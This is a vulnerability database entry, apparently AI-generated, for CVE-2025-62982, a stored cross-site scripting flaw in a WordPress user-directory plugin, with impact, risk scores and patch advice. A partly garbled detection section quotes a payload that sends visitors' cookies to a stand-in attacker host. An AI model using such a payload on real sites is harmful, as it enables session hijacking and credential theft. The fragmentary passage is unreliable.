
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62982 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress plugin Dynamic User Directory by Sarah Giles. It affects all versions up to and including 2.3, and was patched in version 2.4. The vulnerability was reported by researcher Jin Yub on September 21, 2025, and published by Patchstack on October 21, 2025. It carries a CVSS v3.1 base score of 5.9 (Medium) (Patchstack, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting) and specifically manifests as a Stored XSS flaw. Exploitation requires a network-accessible WordPress instance where the attacker holds at least Contributor or Developer-level privileges, and successful impact requires a victim user to interact with the injected content (e.g., visiting a page where the malicious script is stored). The plugin fails to properly sanitize or escape user-supplied input before persisting and rendering it in web pages, allowing an attacker to inject arbitrary JavaScript that executes in the context of other users' browsers (Patchstack).
Successful exploitation allows an attacker with Contributor or Developer privileges to inject persistent malicious scripts into WordPress pages served by the Dynamic User Directory plugin. When other users — including administrators — visit affected pages, the injected scripts execute in their browser context, potentially enabling session hijacking, credential theft, unauthorized administrative actions, or redirection to malicious sites. The scope is marked as Changed, meaning the impact can extend beyond the vulnerable component to affect other users and site integrity (Patchstack).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for at least Contributor-level authentication, limiting the attacker pool (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in an unsanitized field./wp-admin/admin-post.php or plugin settings pages) from Contributor/Developer accounts containing script tags or encoded JavaScript payloads.<script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads (e.g., <script>) stored in the wp_posts or plugin-specific database tables associated with Dynamic User Directory entries.The vendor has released version 2.4 of the Dynamic User Directory plugin, which resolves this vulnerability. Site administrators should update the plugin to version 2.4 or later immediately via the WordPress admin dashboard or by downloading the patched version from the WordPress plugin repository. If an immediate update is not possible, consider temporarily deactivating the plugin or restricting Contributor/Developer role assignments to trusted users only. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard (Patchstack).
Wordfence included this vulnerability in its weekly WordPress vulnerability report covering October 20–26, 2025, noting it as part of a broader set of plugin vulnerabilities disclosed that week (Wordfence). Patchstack, which coordinated the disclosure, classified the priority as Low and noted it is unlikely to be exploited at scale. No significant broader media coverage or notable researcher commentary beyond standard vulnerability aggregation has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."